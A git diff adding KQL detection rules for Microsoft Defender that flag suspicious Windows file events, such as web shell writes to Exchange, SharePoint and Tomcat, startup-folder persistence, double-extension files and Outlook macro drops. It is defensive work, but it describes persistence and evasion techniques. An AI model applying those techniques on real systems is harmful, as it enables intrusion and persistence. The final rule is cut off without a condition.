diff --git a/KQL/rules/windows/file/file_event/suspicious_creation_with_colorcpl.kql b/KQL/rules/windows/file/file_event/suspicious_creation_with_colorcpl.kql
new file mode 100644
index 00000000..e633f25d
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_creation_with_colorcpl.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Creation with Colorcpl
+// Author: frack113
+// Date: 2022-01-21
+// Level: high
+// Description: Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\colorcpl.exe" and (not((FolderPath endswith ".icm" or FolderPath endswith ".gmmp" or FolderPath endswith ".cdmp" or FolderPath endswith ".camp")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_deno_file_written_from_remote_source.kql b/KQL/rules/windows/file/file_event/suspicious_deno_file_written_from_remote_source.kql
new file mode 100644
index 00000000..a68ba8a4
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_deno_file_written_from_remote_source.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Deno File Written from Remote Source
+// Author: Josh Nickels, Michael Taggart
+// Date: 2025-05-22
+// Level: low
+// Description: Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL.
+// This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204, attack.t1059.007, attack.command-and-control, attack.t1105
+// False Positives:
+//   - Legitimate usage of deno to request a file or bring a DLL to a host
+
+DeviceFileEvents
+| where (FolderPath contains "\\deno\\gen\\" or FolderPath contains "\\deno\\remote\\https\\") and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_desktop_ini_action.kql b/KQL/rules/windows/file/file_event/suspicious_desktop_ini_action.kql
new file mode 100644
index 00000000..30ca1cf2
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_desktop_ini_action.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious desktop.ini Action
+// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)
+// Date: 2020-03-19
+// Level: medium
+// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
+// False Positives:
+//   - Operations performed through Windows SCCM or equivalent
+//   - Read only access list authority
+
+DeviceFileEvents
+| where FolderPath endswith "\\desktop.ini" and (not(((InitiatingProcessFolderPath startswith "C:\\Windows\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe" and FolderPath contains "\\JetBrains\\apps\\") or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_desktopimgdownldr_target_file.kql b/KQL/rules/windows/file/file_event/suspicious_desktopimgdownldr_target_file.kql
new file mode 100644
index 00000000..eab18902
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_desktopimgdownldr_target_file.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Desktopimgdownldr Target File
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-03
+// Level: high
+// Description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+//   - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath contains "\\Personalization\\LockScreenImage\\") and (not(FolderPath contains "C:\\Windows\\")) and (not((FolderPath contains ".jpg" or FolderPath contains ".jpeg" or FolderPath contains ".png")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_double_extension_files.kql b/KQL/rules/windows/file/file_event/suspicious_double_extension_files.kql
new file mode 100644
index 00000000..2e4cca10
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_double_extension_files.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Double Extension Files
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2022-06-19
+// Level: high
+// Description: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.007
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where (FolderPath endswith ".rar.exe" or FolderPath endswith ".zip.exe") or ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".gif." or FolderPath contains ".jpeg." or FolderPath contains ".jpg." or FolderPath contains ".mp3." or FolderPath contains ".mp4." or FolderPath contains ".pdf." or FolderPath contains ".png." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".rtf." or FolderPath contains ".svg." or FolderPath contains ".txt." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and (FolderPath endswith ".exe" or FolderPath endswith ".iso" or FolderPath endswith ".rar" or FolderPath endswith ".svg" or FolderPath endswith ".zip"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_executable_file_creation.kql b/KQL/rules/windows/file/file_event/suspicious_executable_file_creation.kql
new file mode 100644
index 00000000..410a2762
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_executable_file_creation.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious Executable File Creation
+// Author: frack113
+// Date: 2022-09-05
+// Level: high
+// Description: Detect creation of suspicious executable file names.
+// Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564
+
+DeviceFileEvents
+| where FolderPath endswith ":\\$Recycle.Bin.exe" or FolderPath endswith ":\\Documents and Settings.exe" or FolderPath endswith ":\\MSOCache.exe" or FolderPath endswith ":\\PerfLogs.exe" or FolderPath endswith ":\\Recovery.exe" or FolderPath endswith ".bat.exe" or FolderPath endswith ".sys.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_created_by_arcsoc_exe.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_by_arcsoc_exe.kql
new file mode 100644
index 00000000..bdbf4ebf
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_created_by_arcsoc_exe.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious File Created by ArcSOC.exe
+// Author: Micah Babinski
+// Date: 2025-11-25
+// Level: high
+// Description: Detects instances where the ArcGIS Server process ArcSOC.exe, which hosts REST services running on an ArcGIS
+// server, creates a file with suspicious file type, indicating that it may be an executable, script file,
+// or otherwise unusual.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.persistence, attack.initial-access, attack.t1127, attack.t1105, attack.t1133
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\ArcSOC.exe" and (FolderPath endswith ".ahk" or FolderPath endswith ".aspx" or FolderPath endswith ".au3" or FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".ps1" or FolderPath endswith ".py" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_created_in_outlook_temporary_directory.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_in_outlook_temporary_directory.kql
new file mode 100644
index 00000000..590e74ad
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_created_in_outlook_temporary_directory.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious File Created in Outlook Temporary Directory
+// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-22
+// Level: high
+// Description: Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments.
+// This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+//   - Opening of headers or footers in email signatures that include SVG images or legitimate SVG attachments
+
+DeviceFileEvents
+| where (FolderPath endswith ".cpl" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".rdp" or FolderPath endswith ".svg" or FolderPath endswith ".vba" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and ((FolderPath contains "\\AppData\\Local\\Packages\\Microsoft.Outlook_" or FolderPath contains "\\AppData\\Local\\Microsoft\\Olk\\Attachments\\") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\" and FolderPath contains "\\Content.Outlook\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_created_in_perflogs.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_in_perflogs.kql
new file mode 100644
index 00000000..41026715
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_created_in_perflogs.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious File Created In PerfLogs
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: medium
+// Description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".bin" or FolderPath endswith ".chm" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".py" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip") and FolderPath startswith "C:\\PerfLogs\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_created_via_onenote_application.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_via_onenote_application.kql
new file mode 100644
index 00000000..45759d1a
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_created_via_onenote_application.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious File Created Via OneNote Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-09
+// Level: high
+// Description: Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.
+//   - Occasional FPs might occur if OneNote is used internally to share different embedded documents
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenotem.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe") and FolderPath contains "\\AppData\\Local\\Temp\\OneNote\\" and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".htm" or FolderPath endswith ".html" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql b/KQL/rules/windows/file/file_event/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql
new file mode 100644
index 00000000..ab80b0ba
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Creation Activity From Fake Recycle.Bin Folder
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-12
+// Level: high
+// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath contains "RECYCLERS.BIN\\" or InitiatingProcessFolderPath contains "RECYCLER.BIN\\") or (FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_creation_in_uncommon_appdata_folder.kql b/KQL/rules/windows/file/file_event/suspicious_file_creation_in_uncommon_appdata_folder.kql
new file mode 100644
index 00000000..9ec0b518
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_creation_in_uncommon_appdata_folder.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious File Creation In Uncommon AppData Folder
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where (FolderPath contains "\\AppData\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cpl" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".lnk" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and FolderPath startswith "C:\\Users\\") and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\LocalLow\\" or FolderPath contains "\\AppData\\Roaming\\") and FolderPath startswith "C:\\Users\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_drop_by_exchange.kql b/KQL/rules/windows/file/file_event/suspicious_file_drop_by_exchange.kql
new file mode 100644
index 00000000..a30d927a
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_drop_by_exchange.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Drop by Exchange
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-04
+// Level: medium
+// Description: Detects suspicious file type dropped by an Exchange component in IIS
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1190, attack.initial-access, attack.t1505.003
+
+DeviceFileEvents
+| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx" or FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_write_to_sharepoint_layouts_directory.kql b/KQL/rules/windows/file/file_event/suspicious_file_write_to_sharepoint_layouts_directory.kql
new file mode 100644
index 00000000..b820c610
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_write_to_sharepoint_layouts_directory.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious File Write to SharePoint Layouts Directory
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-24
+// Level: high
+// Description: Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation.
+// This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath contains "\\15\\TEMPLATE\\LAYOUTS\\" or FolderPath contains "\\16\\TEMPLATE\\LAYOUTS\\") and (FolderPath endswith ".asax" or FolderPath endswith ".ascx" or FolderPath endswith ".ashx" or FolderPath endswith ".asmx" or FolderPath endswith ".asp" or FolderPath endswith ".aspx" or FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cer" or FolderPath endswith ".config" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".jsp" or FolderPath endswith ".jspx" or FolderPath endswith ".php" or FolderPath endswith ".ps1" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\" or FolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_write_to_webapps_root_directory.kql b/KQL/rules/windows/file/file_event/suspicious_file_write_to_webapps_root_directory.kql
new file mode 100644
index 00000000..91fcbf55
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_write_to_webapps_root_directory.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious File Write to Webapps Root Directory
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-20
+// Level: medium
+// Description: Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers.
+// This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003, attack.initial-access, attack.t1190
+
+DeviceFileEvents
+| where FolderPath contains "\\webapps\\ROOT\\" and (FolderPath contains "\\apache" or FolderPath contains "\\tomcat") and FolderPath endswith ".jsp" and (InitiatingProcessFolderPath endswith "\\dotnet.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\java.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_files_in_default_gpo_folder.kql b/KQL/rules/windows/file/file_event/suspicious_files_in_default_gpo_folder.kql
new file mode 100644
index 00000000..4d442bf7
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_files_in_default_gpo_folder.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Files in Default GPO Folder
+// Author: elhoim
+// Date: 2022-04-28
+// Level: medium
+// Description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1036.005, attack.defense-evasion
+
+DeviceFileEvents
+| where FolderPath contains "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_get_variable_exe_creation.kql b/KQL/rules/windows/file/file_event/suspicious_get_variable_exe_creation.kql
new file mode 100644
index 00000000..fac6cf31
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_get_variable_exe_creation.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Get-Variable.exe Creation
+// Author: frack113
+// Date: 2022-04-23
+// Level: high
+// Description: Get-Variable is a valid PowerShell cmdlet
+// WindowsApps is by default in the path where PowerShell is executed.
+// So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546, attack.defense-evasion, attack.t1027
+
+DeviceFileEvents
+| where FolderPath endswith "Local\\Microsoft\\WindowsApps\\Get-Variable.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_interactive_powershell_as_system.kql b/KQL/rules/windows/file/file_event/suspicious_interactive_powershell_as_system.kql
new file mode 100644
index 00000000..723776e6
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_interactive_powershell_as_system.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Interactive PowerShell as SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-07
+// Level: high
+// Description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+//   - Administrative activity
+//   - PowerShell scripts running as SYSTEM user
+
+DeviceFileEvents
+| where FolderPath in~ ("C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt", "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-Interactive")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_lnk_double_extension_file_created.kql b/KQL/rules/windows/file/file_event/suspicious_lnk_double_extension_file_created.kql
new file mode 100644
index 00000000..ac7926f6
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_lnk_double_extension_file_created.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious LNK Double Extension File Created
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2022-11-07
+// Level: medium
+// Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.007
+// False Positives:
+//   - Some tuning is required for other general purpose directories of third party apps
+
+DeviceFileEvents
+| where ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".jpg." or FolderPath contains ".pdf." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and FolderPath endswith ".lnk") and (not(FolderPath contains "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\")) and (not(((InitiatingProcessFolderPath endswith "\\excel.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Excel") or (InitiatingProcessFolderPath endswith "\\powerpnt.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\PowerPoint") or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") or (InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Word"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_msexchangemailboxreplication_aspx_write.kql b/KQL/rules/windows/file/file_event/suspicious_msexchangemailboxreplication_aspx_write.kql
new file mode 100644
index 00000000..e945ae3a
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_msexchangemailboxreplication_aspx_write.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious MSExchangeMailboxReplication ASPX Write
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\MSExchangeMailboxReplication.exe" and (FolderPath endswith ".aspx" or FolderPath endswith ".asp")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_outlook_macro_created.kql b/KQL/rules/windows/file/file_event/suspicious_outlook_macro_created.kql
new file mode 100644
index 00000000..7f5fb2dc
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_outlook_macro_created.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Outlook Macro Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: high
+// Description: Detects the creation of a macro file for Outlook.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM" and (not(InitiatingProcessFolderPath endswith "\\outlook.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_procexp152_sys_file_created_in_tmp.kql b/KQL/rules/windows/file/file_event/suspicious_procexp152_sys_file_created_in_tmp.kql
new file mode 100644
index 00000000..f299a847
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_procexp152_sys_file_created_in_tmp.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious PROCEXP152.sys File Created In TMP
+// Author: xknow (@xknow_infosec), xorxes (@xor_xes)
+// Date: 2019-04-08
+// Level: medium
+// Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.
+// This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1562.001, attack.defense-evasion
+// False Positives:
+//   - Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it.
+
+DeviceFileEvents
+| where (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "PROCEXP152.sys") and (not((InitiatingProcessFolderPath contains "\\procexp64.exe" or InitiatingProcessFolderPath contains "\\procexp.exe" or InitiatingProcessFolderPath contains "\\procmon64.exe" or InitiatingProcessFolderPath contains "\\procmon.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_scheduled_task_write_to_system32_tasks.kql b/KQL/rules/windows/file/file_event/suspicious_scheduled_task_write_to_system32_tasks.kql
new file mode 100644
index 00000000..42b9d589
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_scheduled_task_write_to_system32_tasks.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Scheduled Task Write to System32 Tasks
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-16
+// Level: high
+// Description: Detects the creation of tasks from processes executed from suspicious locations
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "C:\\PerfLogs" or InitiatingProcessFolderPath contains "\\Windows\\System32\\config\\systemprofile") and FolderPath contains "\\Windows\\System32\\Tasks"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_screensaver_binary_file_creation.kql b/KQL/rules/windows/file/file_event/suspicious_screensaver_binary_file_creation.kql
new file mode 100644
index 00000000..1dbaae77
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_screensaver_binary_file_creation.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious Screensaver Binary File Creation
+// Author: frack113
+// Date: 2021-12-29
+// Level: medium
+// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
+// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.002
+
+DeviceFileEvents
+| where FolderPath endswith ".scr" and (not(((InitiatingProcessFolderPath endswith "\\Kindle.exe" or InitiatingProcessFolderPath endswith "\\Bin\\ccSvcHst.exe") or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and FolderPath endswith "\\uwfservicingscr.scr"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_startup_folder_persistence.kql b/KQL/rules/windows/file/file_event/suspicious_startup_folder_persistence.kql
new file mode 100644
index 00000000..832de81f
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_startup_folder_persistence.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious Startup Folder Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2022-08-10
+// Level: high
+// Description: Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors.
+// These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers.
+// This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.t1204.002, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Rare legitimate usage of some of the extensions mentioned in the rule
+
+DeviceFileEvents
